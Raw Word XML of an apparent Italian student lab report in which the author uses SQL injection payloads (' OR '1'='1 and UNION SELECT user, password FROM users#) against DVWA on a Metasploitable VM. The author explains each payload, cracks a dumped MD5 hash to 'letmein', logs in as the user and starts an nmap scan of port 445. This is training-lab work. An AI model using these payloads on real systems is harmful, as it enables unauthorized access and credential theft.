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FD96E" w14:textId="15F394EB" w:rsidR="0023566B" w:rsidRDefault="004A0312" w:rsidP="004A0312">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A0312">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>D4 Progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249398A2" w14:textId="77777777" w:rsidR="004A0312" w:rsidRPr="004A0312" w:rsidRDefault="004A0312" w:rsidP="004A0312"/>
    <w:p w14:paraId="3EE553DD" w14:textId="087BFE6E" w:rsidR="004A0312" w:rsidRDefault="004A0312" w:rsidP="004A0312">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004A0312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17DC645B" wp14:editId="7D02B8D8">
            <wp:extent cx="6058746" cy="2457793"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1691045448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45448" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, algebra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6688" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA7229A" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1008A0CA" w14:textId="4536CC8C" w:rsidR="004A0312" w:rsidRPr="00322D05" w:rsidRDefault="004A0312" w:rsidP="004A0312">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo aver cambiato gli indirizzi IP come richiesti da consegna, sono entrata nella web application DVWA dal browser di Kali all’indirizzo </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00322D05">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.13.150</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Clicco su DVWA e accedo come Admin ( ID: admin e pass: password ), cambio il security level da high a low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B5AB53" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B25D268" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:hAnsi="Ubuntu Mono"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6E7DCA" w14:textId="7C7190AE" w:rsidR="004A0312" w:rsidRDefault="004A0312" w:rsidP="004A0312">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004A0312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC87001" wp14:editId="437D9587">
            <wp:extent cx="6144482" cy="2829320"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1557120377" name="Immagine 1" descr="Immagine che contiene testo, software, Software multimedial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20377" name="Immagine 1" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer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9AAD" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="31F782D4" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="0DC74DE3" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="55038410" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="09B8C2E4" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="3968B977" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="46FE8422" w14:textId="42284532" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="009D1578">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E426F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6007FA" wp14:editId="3E1EE447">
            <wp:extent cx="6120130" cy="4195445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1781895493" name="Immagine 1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95493" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Pagina Web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964F" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="47B4D462" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="3F7B08A0" w14:textId="1DF35AFE" w:rsidR="004A0312" w:rsidRPr="00322D05" w:rsidRDefault="004A0312" w:rsidP="004A0312">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Per trovare la lista degli utenti utilizzo un payload</w:t>
      </w:r>
      <w:r w:rsidR="009D1578" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BF9FC" w14:textId="77777777" w:rsidR="000A56EE" w:rsidRPr="00322D05" w:rsidRDefault="009D1578" w:rsidP="009D1578">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OR ‘1’ = ‘1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>è un payload, cioè una serie di caratteri malevoli che vengono inseriti in un campo di input dell’applicazione per sfruttare una possibile vulnerabilità SQL</w:t>
      </w:r>
      <w:r w:rsidR="000A56EE" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( non metto gli apici all’inizio e alla fine perché sono già sottintesi ). Questo payload viene utilizzato per creare una SQL che è sempre vera. Quando viene inserito in un campo di input dell’applicazione vulnerabile, esso modifica la query SQL in modo che restituisca i dati desiderati dalla tabella, ignorando qualsiasi condizione di filtro o restrizione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643D1E8" w14:textId="5B50593A" w:rsidR="009D1578" w:rsidRPr="00322D05" w:rsidRDefault="009D1578" w:rsidP="009D1578">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) questo carattere è utilizzato per terminare una stringa SQL corrente. Nel caso in cui l’applicazione sia vulnerabile, l’obbiettivo è rompere la query SQL corrente per inserire una parte malevola. </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> )  è un operatore logico che indica una condizione vera se una delle due espressioni è vera, in questo caso viene utilizzato per creare una condizione sempre vera. Qualunque cosa segua OR sarà considerata vera. </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">‘1’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) è un valore costante per creare un’affermazione vera.</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">= ’1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) viene creata una condizione di uguaglianza che confronta il valore nel campo del database con il valore 1, poiché 1 è considerato  vero, questa condizione è sempre vera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B676C" w14:textId="13321250" w:rsidR="009D1578" w:rsidRPr="00322D05" w:rsidRDefault="009D1578" w:rsidP="009D1578">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87E970" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="6621A7A5" w14:textId="77777777" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="004A0312"/>
    <w:p w14:paraId="3159A24A" w14:textId="297E9B71" w:rsidR="009D1578" w:rsidRDefault="009D1578" w:rsidP="009D1578">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009D1578">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791E089A" wp14:editId="103CF1E3">
            <wp:extent cx="6630325" cy="4648849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1240309734" name="Immagine 1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09734" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Pagina Web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072E" w14:textId="77777777" w:rsidR="00556D75" w:rsidRDefault="00556D75" w:rsidP="009D1578">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47091467" w14:textId="77777777" w:rsidR="00556D75" w:rsidRDefault="00556D75" w:rsidP="009D1578">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385BA087" w14:textId="25500CA0" w:rsidR="000A56EE" w:rsidRPr="00322D05" w:rsidRDefault="009D1578" w:rsidP="009D1578">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT user, password </w:t>
      </w:r>
      <w:r w:rsidR="002E0ED0" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> users#</w:t>
      </w:r>
      <w:r w:rsidR="000A56EE" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A56EE" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>è un payload che mi permette di trovare le password criptate degli utenti.</w:t>
      </w:r>
      <w:r w:rsidR="000A56EE" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Questo combina i risultati della query SQL dell’applicazione con i risultati di una query SQL personalizzata che seleziona i nomi utente ( user ) e le password ( password ) dalla tabella users nel database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73775A44" w14:textId="77777777" w:rsidR="00556D75" w:rsidRPr="00322D05" w:rsidRDefault="000A56EE" w:rsidP="009D1578">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) è un operatore che viene utilizzato per combinare i risultati di due o più query SQL in un'unica tabella risultante. In questo caso, stiamo cercando di combinare i risultati della query SQL dell’applicazione con i risultati di una nuova query che stiamo inserendo manualmente</w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT user, password </w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) questa parte del payload rappresenta la query SQL che stiamo cercando di eseguire manualmente. Stiamo cercando le colonne user e password dalla tabella users. La colonna user presumibilmente rappresenta il nome dell’utente mentre la colonna password contiene le password degli utenti.</w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM users </w:t>
      </w:r>
      <w:r w:rsidR="00556D75" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) questa parte specifica da quale tabella stiamo cercando di selezionare i dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EE5F2" w14:textId="1BB848ED" w:rsidR="000A56EE" w:rsidRPr="00322D05" w:rsidRDefault="00556D75" w:rsidP="009D1578">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) è un carattere di commento SQL che viene utilizzato per terminare la query e commentare eventuali testi rimanenti della query. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8BCCC6" w14:textId="77777777" w:rsidR="00556D75" w:rsidRDefault="00556D75" w:rsidP="009D1578"/>
    <w:p w14:paraId="4D830B2F" w14:textId="19C94814" w:rsidR="00556D75" w:rsidRDefault="00556D75" w:rsidP="00556D75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DEE801" wp14:editId="6DEC6D20">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-333375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4495800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="295275" cy="200025"/>
                <wp:effectExtent l="0" t="19050" r="47625" b="47625"/>
                <wp:wrapNone/>
                <wp:docPr id="1268441823" name="Freccia a destr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00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69F9C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4" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:-26.25pt;margin-top:354pt;width:23.25pt;height:15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" adj="14284" fillcolor="#4472c4 [3204]" strokecolor="#09101d [484]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00556D75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279FF2E4" wp14:editId="3E35CDD9">
            <wp:extent cx="6592220" cy="4906060"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1145965847" name="Immagine 1" descr="Immagine che contiene testo, schermata, Sito Web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65847" name="Immagine 1" descr="Immagine che contiene testo, schermata, Sito Web, Pagina Web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7AFA" w14:textId="77777777" w:rsidR="00C51EB1" w:rsidRDefault="00C51EB1" w:rsidP="001A6F33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D53590" w14:textId="3A103EBE" w:rsidR="00412986" w:rsidRDefault="00C51EB1" w:rsidP="001A6F33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51EB1">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C43D678" wp14:editId="6E013A42">
            <wp:extent cx="6645910" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="894197866" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Sito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97866" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Sito Web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79F0" w14:textId="77777777" w:rsidR="006F0440" w:rsidRDefault="006F0440" w:rsidP="001A6F33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632E4A39" w14:textId="3FDCAE91" w:rsidR="00574459" w:rsidRPr="00322D05" w:rsidRDefault="00574459" w:rsidP="00574459">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo aver trovato l’hash della password di Pablo Picasso </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bisognava decodificarla, per farlo ho utilizzato</w:t>
      </w:r>
      <w:r w:rsidR="0064321C" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> il sito</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CrackStation</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, la password è letmein. Come da screen ho loggato nell’account di Pablo Picasso con l’admin: pablo e come password: letmein.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D337E6" w14:textId="77777777" w:rsidR="00F4337A" w:rsidRDefault="00F4337A" w:rsidP="001A6F33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB25EF6" w14:textId="131D274C" w:rsidR="006F0440" w:rsidRDefault="00412986" w:rsidP="00574459">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412986">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30544D05" wp14:editId="2D1B74B0">
            <wp:extent cx="6411220" cy="2619741"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1195589445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89445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1220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B8E0" w14:textId="77777777" w:rsidR="006F0440" w:rsidRDefault="006F0440" w:rsidP="00412986">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F38A33C" w14:textId="5ADAF2D6" w:rsidR="006F0440" w:rsidRDefault="006F0440" w:rsidP="006F0440">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65AE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CA2E4DE" wp14:editId="3032EC6B">
            <wp:extent cx="6120130" cy="3832860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1826460910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60910" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, software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39C7" w14:textId="77777777" w:rsidR="00574459" w:rsidRDefault="00574459" w:rsidP="00574459">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783B3E23" w14:textId="77777777" w:rsidR="00574459" w:rsidRPr="00322D05" w:rsidRDefault="00574459" w:rsidP="00574459">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Per prima cosa ho fatto una scansione delle porte sulla macchina Metasploitable utilizzando </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap 192.168.13.150</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, identificando così le porte aperte e i servizi in ascolto sulla macchina. Dalla scansione trovo la porta 445/tcp </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>(quella richiesta nell’esercizio).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C127E" w14:textId="77777777" w:rsidR="00574459" w:rsidRDefault="00574459" w:rsidP="006F0440">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697F812C" w14:textId="77777777" w:rsidR="005920B8" w:rsidRDefault="005920B8" w:rsidP="005920B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EC5F6A" w14:textId="1B153037" w:rsidR="005920B8" w:rsidRDefault="005920B8" w:rsidP="005920B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D57C33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E76521" wp14:editId="51736FCC">
            <wp:extent cx="5526405" cy="4012063"/>
